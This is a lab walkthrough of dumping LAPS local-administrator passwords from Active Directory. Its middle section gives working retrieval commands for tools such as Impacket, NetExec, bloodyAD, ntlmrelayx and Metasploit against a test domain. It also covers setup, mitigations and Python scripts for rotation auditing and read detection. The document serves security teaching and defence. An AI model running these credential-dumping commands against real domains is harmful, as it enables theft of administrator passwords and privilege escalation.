Credential Dumping: LAPS

Introduction:

Active Directory (AD) is a critical component of enterprise networks, and ensuring its security is paramount for protecting sensitive data and maintaining system integrity. The Local Administrator Password Solution (LAPS) is a Microsoft feature that manages local administrator passwords for domain-joined computers. While LAPS enhances security by randomizing and managing these passwords, improper configuration or excessive permissions can lead to significant vulnerabilities. Attackers can exploit these weaknesses to retrieve LAPS passwords, gain administrative access to systems, and escalate privileges within the domain.

This guide provides a detailed walkthrough of how attackers can exploit LAPS vulnerabilities using tools like Active Directory Explorer (AD Explorer) and PowerView. We’ll cover the steps, commands, and techniques used to retrieve LAPS passwords, along with best practices to mitigate these risks.

Contents:

  • Understanding LAPS and Its Vulnerabilities
  • Lab setup
  • Tools for Exploiting LAPS
  • Step-by-Step Exploitation of LAPS
    • Retrieving LAPS Passwords with Impacket using BloodHound
    • NetExec
    • pyLAPS
    • LAPSDumper
    • bloodyAD
    • LDAP queries
    • NTLM Relay
    • ldap_shell
    • Get-LAPSPassword
    • NetTools
    • Metasploit
    • Powerview
    • AD Explorer
  • Security Implications of LAPS Exploitation
  • Best Practices for Securing LAPS
  • Conclusion

Understanding LAPS and Its Vulnerabilities

What is LAPS?

LAPS is a Microsoft solution that automatically manages and rotates local administrator passwords for domain-joined computers. The passwords are stored in Active Directory attributes:

  • ms-Mcs-AdmPwd: Stores the LAPS password.
  • ms-Mcs-AdmPwdExpirationTime: Stores the password expiration time.

Common Misconfigurations

  • Excessive permissions granted to users or groups to read LAPS passwords.
  • Lack of monitoring and auditing of LAPS-related permissions.
  • Failure to restrict access to sensitive AD attributes.

How Attackers Exploit LAPS

Attackers with sufficient permissions can retrieve LAPS passwords, gain administrative access to computers, and escalate privileges within the domain.

Lab Setup

Step 1: Create a New Organizational Unit (OU)

  1. In the ADUC console, expand the domain (e.g., ignite.local) in the left pane.
  2. Right-click on the domain or an existing OU where you want to create the new OU.
  3. Select New > Organizational Unit.

In the New Object - Organizational Unit window, enter a name for the OU (e.g., Tech).

Step 2: Verify the New OU

  1. In the ADUC console, navigate to the location where you created the OU.
  2. Ensure the new OU (e.g., Tech) is visible in the list.

Step 3: Add a Computer to the New OU

  1. In the ADUC console, navigate to the Computers container (or the OU where the computer object currently resides).
  2. Locate the computer object you want to move (e.g., MSEDGEWIN10) and move it into the new OU.

Step 4: Configure LAPS

Download and install the LAPS software on the Domain Controller.

Configure LAPS Group Policy:

Open Group Policy Management and create a new GPO.


Navigate to Computer Configuration > Policies > Administrative Templates > LAPS.

Enable the "Enable local admin password management" setting and configure the password settings.

Ensure the LAPS GPO is applied to the client machine.

Check that the local administrator password is managed by LAPS.

Step 6: Configuring LAPS Setup Options

  1. Run the LAPS installer and proceed to the Custom Setup screen.
  2. Select components like the AdminPwd GPO Extension and Management Tools.
  3. Complete the installation.

Step 7: Updating the AD Schema for LAPS

Open PowerShell and import the AdmPwd.PS module:

Import-Module AdmPwd.PS

Update the AD schema:

Update-AdmPwdADSchema

Grant the computers in the OU permission to write their own password and expiration-time attributes:

Set-AdmPwdComputerSelfPermission -OrgUnit Tech

Step 8: Managing Group Policy Objects (GPOs)

Configuring LAPS Setup

  1. Open the Group Policy Management Console (GPMC).
  2. Navigate to Computer Configuration > Policies > Administrative Templates > LAPS.
  3. Enable settings for local admin password management.

Setting Password Complexity and Expiration

Navigate to LAPS > Password Settings in the GPO editor.

Define password complexity, length, and expiration policies.

Step 9: Viewing and Managing LAPS Passwords

Retrieving LAPS Password Attributes

In ADUC, locate the computer object (e.g., MSEDGEWIN10).

Open the Properties window and view the Attribute Editor tab.

Check attributes like ms-Mcs-AdmPwd and ms-Mcs-AdmPwdExpirationTime.
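ADUC and AD Explorer render ms-Mcs-AdmPwdExpirationTime as a date, but over LDAP the attribute comes back as a large integer in Windows FILETIME format (100-nanosecond ticks since 1601-01-01 UTC). The following Python script is an added example, not part of this guide or of the LAPS product: it converts that raw value and then uses it to audit rotation health across a set of computers, reporting hosts whose attribute was never populated, hosts whose expiry is long past without a rotation, and hosts whose expiry has been pushed beyond the GPO maximum. The computer names, the 30-day policy age and the sample values are constructed for the example; the MSEDGEWIN10 value is the clock time shown in AD Explorer above, taken as UTC.

```python
from datetime import datetime, timedelta, timezone

# Over LDAP, ms-Mcs-AdmPwdExpirationTime is a large integer in Windows FILETIME format:
# 100-nanosecond ticks since 1601-01-01 00:00:00 UTC, returned as a decimal string.
FILETIME_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)
TICKS_PER_SECOND = 10_000_000


def filetime_to_datetime(value):
    """Convert a raw FILETIME value (int or decimal string) to an aware UTC datetime."""
    seconds, rest = divmod(int(value), TICKS_PER_SECOND)
    return FILETIME_EPOCH + timedelta(seconds=seconds, microseconds=rest // 10)


def datetime_to_filetime(dt):
    """Inverse conversion; used below to build sample values relative to 'now'."""
    delta = dt.astimezone(timezone.utc) - FILETIME_EPOCH
    return (delta.days * 86400 + delta.seconds) * TICKS_PER_SECOND + delta.microseconds * 10


def rotation_status(expiration, now, max_age_days=30, grace_hours=24):
    """Classify one computer's LAPS rotation state from its expiration attribute.

    expiration   - raw ms-Mcs-AdmPwdExpirationTime, or None/"" when the attribute is unset
    now          - current time as an aware datetime
    max_age_days - password age configured in the LAPS GPO (30 days assumed for this example)
    grace_hours  - tolerance after expiry before the host is reported as stale
    """
    if expiration in (None, "", "0", 0):
        return "unmanaged"              # the LAPS client has never written a password here
    expires = filetime_to_datetime(expiration)
    if expires + timedelta(hours=grace_hours) < now:
        return "stale"                  # expiry passed, no rotation: GPO not applying, or host offline
    if expires > now + timedelta(days=max_age_days):
        return "expiry-beyond-policy"   # expiry later than the GPO allows, so no rotation on schedule
    return "ok"


def audit(computers, now, **kwargs):
    """Map computer name -> status for (name, expiration) pairs as returned by an LDAP search."""
    return {name: rotation_status(exp, now, **kwargs) for name, exp in computers}


# Constructed sample input: names and values are made up for the example.
NOW = datetime(2025, 1, 20, 12, 0, 0, tzinfo=timezone.utc)
SAMPLE = [
    ("MSEDGEWIN10", "133819258380000000"),                                # 2025-01-21 09:37:18 UTC
    ("FILESRV01", str(datetime_to_filetime(NOW - timedelta(days=10)))),   # expired ten days ago
    ("BUILD02", str(datetime_to_filetime(NOW + timedelta(days=365)))),    # expiry a year out
    ("LEGACY-XP", None),                                                  # attribute never set
]

if __name__ == "__main__":
    for name, status in audit(SAMPLE, NOW).items():
        print(f"{name:12} {status}")
```

The "expiry-beyond-policy" case is the one worth acting on: the LAPS GPO has a "Do not allow password expiration time longer than required by policy" setting that makes the client reset such values, and a host that keeps reporting a far-future expiry after the GPO is applied has stopped being managed. The "stale" threshold is a reporting tolerance, not a LAPS setting.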

Step 10: Advanced Security and Permissions Management

Reviewing Security Permissions

Open the Properties window of a computer object.

Navigate to the Security tab and review assigned permissions.

Configuring Permission Entries

Access the Advanced Security Settings window for a computer object.

Add, edit, or remove permission entries as required.

Tools for Exploiting LAPS

Tools Overview

  • Impacket scripts: A Python library for crafting and manipulating network protocols to perform tasks like SMB and NTLM attacks.
  • BloodHound: A graphical tool used to map and analyze Active Directory relationships and attack paths to identify potential privilege escalation and lateral movement opportunities.
  • NetExec: A tool for executing remote commands on Windows systems using SMB or RPC.
  • pyLAPS: A Python-based tool for querying and retrieving LAPS-managed passwords from Active Directory.
  • LAPSDumper: A script designed to extract LAPS passwords from Active Directory securely.
  • bloodyAD: A powerful tool for automating Active Directory attacks and gathering information, including LAPS attributes.
  • ldapsearch: A command-line utility for querying LDAP directories and extracting specific attributes, such as LAPS passwords.
  • ldap_shell: An interactive shell for executing LDAP queries and managing directory objects.
  • Get-LAPSPassword: A PowerShell script to retrieve LAPS-managed passwords from Active Directory securely.
  • NetTools: A comprehensive toolkit for managing and querying network and Active Directory resources.
  • SharpLAPS: A C#-based tool for retrieving LAPS passwords using secure credentials.
  • Metasploit: A penetration testing framework with modules for querying and exploiting Active Directory, including LAPS.
  • PowerView: A PowerShell module for Active Directory enumeration and privilege escalation activities.
  • AD Explorer: A graphical tool for exploring and managing Active Directory structures and attributes interactively.

Step-by-Step Exploitation of LAPS

Retrieving LAPS Passwords with Impacket using BloodHound

Ingest AD data into BloodHound.

bloodhound-python -u raj -p Password@1 -ns 192.168.1.48 -d ignite.local -c All

Search for the computer object (MSEDGEWIN10).

Identify the command BloodHound suggests for escalating privileges using the retrieved LAPS password.

Using the Impacket GetLAPSPassword script, enumerate the LAPS password:

impacket-GetLAPSPassword ignite.local/raj:Password@1 -dc-ip 192.168.1.48


NetExec

nxc ldap "192.168.1.48" -d "ignite.local" -u "raj" -p "Password@1" --module laps

pyLAPS

git clone https://github.com/p0dalirius/pyLAPS

./pyLAPS.py --action get -d "192.168.1.48" -u "raj" -p "Password@1"

LAPSDumper

https://github.com/n00py/LAPSDumper

python laps.py -u 'raj' -p 'Password@1' -d 'ignite.local'

bloodyAD

bloodyAD --host "192.168.1.48" -d "ignite.local" -u "raj" -p "Password@1" get search --filter '(ms-mcs-admpwdexpirationtime=*)' --attr ms-mcs-admpwd,ms-mcs-admpwdexpirationtime

LDAP queries

ldapsearch -x -H ldap://192.168.1.48 -D "raj@ignite.local" -w "Password@1" -b "dc=ignite,dc=local" "(&(objectCategory=computer)(ms-MCS-AdmPwd=*))" ms-MCS-AdmPwd

There is a Metasploit module available through which we can dump the LAPS password.

msf6 > use auxiliary/gather/ldap_query

set rhosts 192.168.1.48

set username raj

set password Password@1

set domain ignite.local

set action ENUM_LAPS_PASSWORDS

run

NTLM Relay

impacket-ntlmrelayx -t ldaps://192.168.1.48 -debug --dump-laps --no-dump --no-da --no-acl --no-validate-privs

ldap_shell

git clone https://github.com/PShlyundin/ldap_shell.git

cd ldap_shell

python3 -m pip install .

ldap_shell ignite.local/raj:Password@1 -dc-ip 192.168.1.48

Get-LAPSPasswords

powershell -ep bypass

Import-Module ./Get-LAPSPasswords.ps1

Get-LAPSPasswords -DomainController 192.168.1.48 -Credential IGNITE\raj | Format-Table -AutoSize

NetTools

Retrieving LAPS Passwords with SharpLAPS

SharpLAPS.exe /user:IGNITE\raj /pass:Password@1 /host:192.168.1.48

Metasploit

use post/windows/gather/credentials/enum_laps

set session 1

run

PowerView

Import-Module .\PowerView.ps1

Get-DomainComputer -Identity MSEDGEWIN10 -Properties ms-Mcs-AdmPwd, ms-Mcs-AdmPwdExpirationTime

AD Explorer

Open AD Explorer and connect to the domain controller.

Navigate to the computer object (CN=MSEDGEWIN10,OU=Tech,DC=ignite,DC=local).

View LAPS attributes:

  • ms-Mcs-AdmPwd: /[ezL6hb0w9INQ]
  • ms-Mcs-AdmPwdExpirationTime: 1/21/2025 9:37:18 AM

Security Implications of LAPS Exploitation

Risks of LAPS Password Exposure

  • Attackers can gain administrative access to domain-joined computers.
  • Privilege escalation within the domain becomes possible.
  • Sensitive data and systems are at risk of compromise.

Real-World Attack Scenarios

  • Attackers use LAPS passwords to move laterally across the network.
  • Compromised computers are used to escalate privileges to domain admin.

Best Practices for Securing LAPS

Restricting Access to LAPS Passwords

Use the Set-AdmPwdReadPasswordPermission cmdlet to restrict access:

Set-AdmPwdReadPasswordPermission -Identity "Tech" -AllowedPrincipals "Domain Admins"

Implementing Least Privilege

  • Grant LAPS access only to trusted users and groups.
  • Regularly review and update permissions.

Monitoring and Auditing AD Permissions

  • Use tools like BloodHound to identify and remediate attack paths.
  • Enable auditing for LAPS-related activities.
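Reads of ms-Mcs-AdmPwd appear in the domain controller's Security log as Event ID 4662 once a SACL auditing ReadProperty on the LAPS attribute is placed on the computer objects and Audit Directory Service Access is enabled. The following Python detection is an added example, not part of this guide: it parses simplified 4662 records, flags password reads by principals outside the set granted with Set-AdmPwdReadPasswordPermission (the least-privilege review above), and flags any principal that reads many computers' passwords within a short window, which is how the bulk-retrieval tools covered earlier look from the log. The log lines, the attribute GUID (schemaIDGUID for ms-Mcs-AdmPwd is generated per forest by Update-AdmPwdADSchema), the group name IGNITE\laps-admins and the thresholds are constructed placeholders.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta, timezone

# PLACEHOLDER: the schemaIDGUID of ms-Mcs-AdmPwd differs per forest; in a real deployment
# it is read from the schema partition and the 4662 Properties field is matched against it.
ADMPWD_ATTR_GUID = "11111111-2222-3333-4444-555555555555"

# Principals granted read access with Set-AdmPwdReadPasswordPermission (hypothetical group).
ALLOWED_READERS = {r"IGNITE\laps-admins"}

READ_PROPERTY = 0x10   # ADS_RIGHT_DS_READ_PROP bit in the 4662 Access Mask

# Constructed one-line rendering of a 4662 event; a production rule would take these
# fields from the EventData XML of the real event instead.
LINE_RE = re.compile(
    r"^(?P<ts>\S+) 4662 subject=(?P<subject>\S+) object=(?P<object>\S+) "
    r"props=(?P<props>\S+) mask=(?P<mask>0x[0-9a-fA-F]+)$"
)


def parse_event(line):
    """Parse one constructed 4662 line; return None for other events or malformed lines."""
    m = LINE_RE.match(line)
    if not m:
        return None
    return {
        "ts": datetime.strptime(m["ts"], "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc),
        "subject": m["subject"],
        "object": m["object"],
        "props": set(m["props"].split(",")),
        "mask": int(m["mask"], 16),
    }


def laps_password_reads(lines):
    """Yield only the events where ms-Mcs-AdmPwd was read (ReadProperty bit + LAPS attribute GUID)."""
    for line in lines:
        ev = parse_event(line)
        if ev and ev["mask"] & READ_PROPERTY and ADMPWD_ATTR_GUID in ev["props"]:
            yield ev


def detect(lines, allowed=ALLOWED_READERS, bulk_threshold=5, window=timedelta(minutes=10)):
    """Return (rule, subject, detail) alerts.

    unauthorized-read: a principal outside `allowed` read a LAPS password.
    bulk-read: one principal read the passwords of >= bulk_threshold distinct computers
               within `window`; a single LDAP query returning every ms-Mcs-AdmPwd
               produces exactly this burst.
    """
    alerts = []
    reads_by_subject = defaultdict(list)   # subject -> [(timestamp, computer DN)]
    for ev in laps_password_reads(lines):
        if ev["subject"] not in allowed:
            alerts.append(("unauthorized-read", ev["subject"], ev["object"]))
        reads_by_subject[ev["subject"]].append((ev["ts"], ev["object"]))

    for subject, reads in reads_by_subject.items():
        reads.sort()
        for i, (start, _) in enumerate(reads):
            hosts = {dn for ts, dn in reads[i:] if ts - start <= window}
            if len(hosts) >= bulk_threshold:
                alerts.append(("bulk-read", subject, f"{len(hosts)} computers within {window}"))
                break
    return alerts


# Constructed sample log: one legitimate read, one read of a different attribute (the
# expiration time, placeholder GUID), a burst of six password reads by an ordinary user,
# the computer account writing its own password (mask 0x20, normal LAPS behaviour),
# and an unrelated event the rule does not parse.
SAMPLE_LOG = r"""
2025-01-21T09:40:01Z 4662 subject=IGNITE\laps-admins object=CN=FILESRV01,OU=Tech,DC=ignite,DC=local props=11111111-2222-3333-4444-555555555555 mask=0x10
2025-01-21T09:41:10Z 4662 subject=IGNITE\raj object=CN=MSEDGEWIN10,OU=Tech,DC=ignite,DC=local props=66666666-7777-8888-9999-000000000000 mask=0x10
2025-01-21T09:42:00Z 4662 subject=IGNITE\raj object=CN=MSEDGEWIN10,OU=Tech,DC=ignite,DC=local props=11111111-2222-3333-4444-555555555555 mask=0x10
2025-01-21T09:42:00Z 4662 subject=IGNITE\raj object=CN=FILESRV01,OU=Tech,DC=ignite,DC=local props=11111111-2222-3333-4444-555555555555 mask=0x10
2025-01-21T09:42:01Z 4662 subject=IGNITE\raj object=CN=BUILD02,OU=Tech,DC=ignite,DC=local props=11111111-2222-3333-4444-555555555555 mask=0x10
2025-01-21T09:42:01Z 4662 subject=IGNITE\raj object=CN=HR-PC01,OU=Tech,DC=ignite,DC=local props=11111111-2222-3333-4444-555555555555 mask=0x10
2025-01-21T09:42:02Z 4662 subject=IGNITE\raj object=CN=HR-PC02,OU=Tech,DC=ignite,DC=local props=11111111-2222-3333-4444-555555555555 mask=0x10
2025-01-21T09:42:02Z 4662 subject=IGNITE\raj object=CN=DEV-WS07,OU=Tech,DC=ignite,DC=local props=11111111-2222-3333-4444-555555555555 mask=0x10
2025-01-21T09:45:00Z 4662 subject=IGNITE\MSEDGEWIN10$ object=CN=MSEDGEWIN10,OU=Tech,DC=ignite,DC=local props=11111111-2222-3333-4444-555555555555 mask=0x20
2025-01-21T09:46:00Z 4624 logon event, not a directory-service access record
""".strip().splitlines()

if __name__ == "__main__":
    for rule, subject, detail in detect(SAMPLE_LOG):
        print(f"{rule:18} {subject:22} {detail}")
```

The two rules are deliberately separate: an allowed helpdesk group that suddenly reads every computer's password still trips the bulk-read rule, and a single unexpected read by an ordinary user trips the unauthorized-read rule even though it is far below the bulk threshold. Tune bulk_threshold and window to how many hosts a legitimate reader touches in one session in your environment.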

Conclusion

LAPS is a powerful tool for managing local administrator passwords, but misconfigurations can lead to significant security risks. By understanding how attackers exploit LAPS and implementing best practices, organizations can secure their Active Directory environments and prevent privilege escalation attacks.